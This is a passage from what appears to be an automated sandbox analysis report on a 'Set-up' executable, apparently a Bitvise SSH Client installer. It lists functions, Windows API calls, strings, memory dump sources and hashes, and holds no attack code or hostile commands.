                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$CriticalHandleInitializeModuleSection
                                                                                                                                  • String ID: AcquireSRWLockExclusive$AcquireSRWLockShared$InitializeSRWLock$ReleaseSRWLockExclusive$ReleaseSRWLockShared$kernel32.dll
                                                                                                                                  • API String ID: 410524075-2154951675
                                                                                                                                  • Opcode ID: 8ba7a023f9ae54432c4006fa593876ef681096ee5daafdb9684c17520c5c2342
                                                                                                                                  • Instruction ID: 582233628f62bb8a488c671ee1c731dca0d0f0b9a8ef1cf282ecfab74bf3bf9b
                                                                                                                                  • Opcode Fuzzy Hash: 8ba7a023f9ae54432c4006fa593876ef681096ee5daafdb9684c17520c5c2342
                                                                                                                                  • Instruction Fuzzy Hash: 612135B5E11214AFC724DF68A849A5EBFFCAF58720F00417AF405D3248DB741948CBD0
                                                                                                                                  Function 01079BC0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 79libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01079C14
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockShared), ref: 01079C22
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 01079C33
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockShared), ref: 01079C44
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 01079C55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 01079C66
                                                                                                                                  • InitializeCriticalSection.KERNEL32(?), ref: 01079C82
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32 ref: 00E4DEE3
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEEB
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$CriticalHandleInitializeModuleSection
                                                                                                                                  • String ID: AcquireSRWLockExclusive$AcquireSRWLockShared$InitializeSRWLock$ReleaseSRWLockExclusive$ReleaseSRWLockShared$kernel32.dll
                                                                                                                                  • API String ID: 410524075-2154951675
                                                                                                                                  • Opcode ID: cb8b5a4c7aa9b373ab35080af41894311a6404e5ca4cbc12f997231d31559d69
                                                                                                                                  • Instruction ID: a1387c1e7c53bd82354f6990e81e42f354b24222a66c7422dffdf364a42dcdfd
                                                                                                                                  • Opcode Fuzzy Hash: cb8b5a4c7aa9b373ab35080af41894311a6404e5ca4cbc12f997231d31559d69
                                                                                                                                  • Instruction Fuzzy Hash: B521F775E51214AFCB359B78A848A5EBFFDEF49710F0800AAF815D3208D7B45944CBE1
                                                                                                                                  Function 01111FE0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 334COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 011120FF
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: - $ use only.$2$6$9.39$Activation code valid for upgrades released until $Bitvise SSH Client $This license is good for business and government use.$This license is granted for $free of charge for use in all environments$licensed to
                                                                                                                                  • API String ID: 2281437974-2095094827
                                                                                                                                  • Opcode ID: 57c0c14a83c7599d06316fc2bdac8b138d406d4b08d7786ad4b735a9e56e416c
                                                                                                                                  • Instruction ID: 9958127b5a262c889644d01957d744b697f25b28836acc789fb1982219fa10a6
                                                                                                                                  • Opcode Fuzzy Hash: 57c0c14a83c7599d06316fc2bdac8b138d406d4b08d7786ad4b735a9e56e416c
                                                                                                                                  • Instruction Fuzzy Hash: EBC19F70A00249AEDF18EBA4D855FDEFBB8AF14700F104569F552B71D2EB70AB48CB91
                                                                                                                                  Function 00E3C3EA Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 326COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E3C3EA
                                                                                                                                    • Part of subcall function 00E59DF0: OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                    • Part of subcall function 00E59DF0: GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                    • Part of subcall function 00E59DF0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C5D8
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,00000001,?,?,00000000,?), ref: 00E3C5F4
                                                                                                                                    • Part of subcall function 00E8C970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,460C02D8,?,00000000), ref: 00E8C9B7
                                                                                                                                    • Part of subcall function 00E8C970: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00E8CA33
                                                                                                                                    • Part of subcall function 00E8C970: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E8CA50
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C426
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • new.LIBCMT ref: 00E3C42D
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?), ref: 00E3C441
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E3C62D
                                                                                                                                  Strings
                                                                                                                                  • %, xrefs: 00E3C9C4
                                                                                                                                  • ", xrefs: 00E3C764
                                                                                                                                  • Only users with administrative rights can apply updates., xrefs: 00E3C405
                                                                                                                                  • Updates cannot be applied: , xrefs: 00E3C573
                                                                                                                                  • A log file for this update will be stored in directory:, xrefs: 00E3C70B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentException@8Throw$CreateErrorExceptionFirstLastOpenProcess32RaiseSnapshotTokenToolhelp32
                                                                                                                                  • String ID: "$%$A log file for this update will be stored in directory:$Only users with administrative rights can apply updates.$Updates cannot be applied:
                                                                                                                                  • API String ID: 3617671986-1672820807
                                                                                                                                  • Opcode ID: c75afd77122f356b52a6f11abdadc2fef0ed467013c1f20c8af5106e23a40397
                                                                                                                                  • Instruction ID: 0ab8335e9470d1c4566f55c1aa77211cae3f9ddb66a80b339c8864a41eb088c0
                                                                                                                                  • Opcode Fuzzy Hash: c75afd77122f356b52a6f11abdadc2fef0ed467013c1f20c8af5106e23a40397
                                                                                                                                  • Instruction Fuzzy Hash: 7ED1AC70D04248EEDB15EBB4D95ABDDBFF4AF11308F2490A8E00977292DB745B48DB62
                                                                                                                                  Function 00E59EB0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 231COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5AC70: GetTokenInformation.ADVAPI32(?,011A3C52(TokenIntegrityLevel),00000000,00000000,460C02D8,460C02D8,011A3C52,?,?), ref: 00E5ACB0
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5ACBE
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5ACD4
                                                                                                                                    • Part of subcall function 00E5AC70: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5AD41
                                                                                                                                    • Part of subcall function 00E5AC70: GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,?,?,00000000,00000000,00000002,460C02D8), ref: 00E5AD86
                                                                                                                                    • Part of subcall function 00E5AC70: GetLastError.KERNEL32 ref: 00E5AD94
                                                                                                                                  • IsValidSid.ADVAPI32(00000000,460C02D8,00000002,460C02D8,460C02D8,011A3C52,?,?), ref: 00E59F4E
                                                                                                                                  • EqualSid.ADVAPI32(?,-00000004), ref: 00E59F6E
                                                                                                                                  • IsValidSid.ADVAPI32(?,011A3C52,?), ref: 00E5A077
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E5A082
                                                                                                                                  • CopySid.ADVAPI32(00000000,00000001,?,!af_,datavect<unsigned char>::begin,000001E2,?,01303694), ref: 00E5A0C1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A105
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A130
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Exception@8InformationThrowTokenValid$CopyEqualLength
                                                                                                                                  • String ID: !af_$CopySid()$datavect<unsigned char>::begin$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1022477060-310490073
                                                                                                                                  • Opcode ID: cfd1e655eafad3810d51f0945d67425e5f1b8145844cc2415edd8efa1339dfab
                                                                                                                                  • Instruction ID: 1c5f5a79a1ebc1ec10924f2b15b57f50af72c59b2c4e6edaef7418bb03e012e1
                                                                                                                                  • Opcode Fuzzy Hash: cfd1e655eafad3810d51f0945d67425e5f1b8145844cc2415edd8efa1339dfab
                                                                                                                                  • Instruction Fuzzy Hash: 6271D071A04205ABDB24DFA5DC45BAEBBF8AB54719F14092DF815B3280E770A948C7A2
                                                                                                                                  Function 00E6E010 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 372COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6E480: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?), ref: 00E6E52A
                                                                                                                                    • Part of subcall function 00E6E480: __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E586
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E171
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000), ref: 00E6E192
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6E19F
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E1E0
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,460C02D9,-00000002,00000000), ref: 00E6E206
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6E210
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6E251
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$EnvironmentErrorExpandLastStrings$QueryValue
                                                                                                                                  • String ID: !af_$RegQueryValueExW()$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 4015144550-2130799390
                                                                                                                                  • Opcode ID: e0386c58709341741697478ba27d06870567376402acad09aea29b7b1bf94f4f
                                                                                                                                  • Instruction ID: 6e103d2f71bc5a4c1405e8a0a9babe20c1fc906e8af6c77e6e7339c2af71de59
                                                                                                                                  • Opcode Fuzzy Hash: e0386c58709341741697478ba27d06870567376402acad09aea29b7b1bf94f4f
                                                                                                                                  • Instruction Fuzzy Hash: 27D1D034A402099FCF18DF64D894BEEBBB9AF44754F048168E815BB3C5DB74AD05CBA0
                                                                                                                                  Function 0112D746 Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0112D78A
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6AB
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6BD
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6CF
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6E1
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C6F3
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C705
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C717
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C729
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C73B
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C74D
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C75F
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C771
                                                                                                                                    • Part of subcall function 0112C68E: _free.LIBCMT ref: 0112C783
                                                                                                                                  • _free.LIBCMT ref: 0112D77F
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112D7A1
                                                                                                                                  • _free.LIBCMT ref: 0112D7B6
                                                                                                                                  • _free.LIBCMT ref: 0112D7C1
                                                                                                                                  • _free.LIBCMT ref: 0112D7E3
                                                                                                                                  • _free.LIBCMT ref: 0112D7F6
                                                                                                                                  • _free.LIBCMT ref: 0112D804
                                                                                                                                  • _free.LIBCMT ref: 0112D80F
                                                                                                                                  • _free.LIBCMT ref: 0112D847
                                                                                                                                  • _free.LIBCMT ref: 0112D84E
                                                                                                                                  • _free.LIBCMT ref: 0112D86B
                                                                                                                                  • _free.LIBCMT ref: 0112D883
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 00ab8a3b3e44644e3a792b4cddd8db08edbe3fb1ea8c502d1223acba6fe81ca9
                                                                                                                                  • Instruction ID: 507d04aae8dd5170cdefe0329fd4756c5cd92de05c9444e4dab17f6bd80f2562
                                                                                                                                  • Opcode Fuzzy Hash: 00ab8a3b3e44644e3a792b4cddd8db08edbe3fb1ea8c502d1223acba6fe81ca9
                                                                                                                                  • Instruction Fuzzy Hash: C53169316046629FEF2DAAB8F844B5AB7E8EF00318F50442DE95CD7190DF74E8A4CB21
                                                                                                                                  Function 00E76A60 Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 306COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
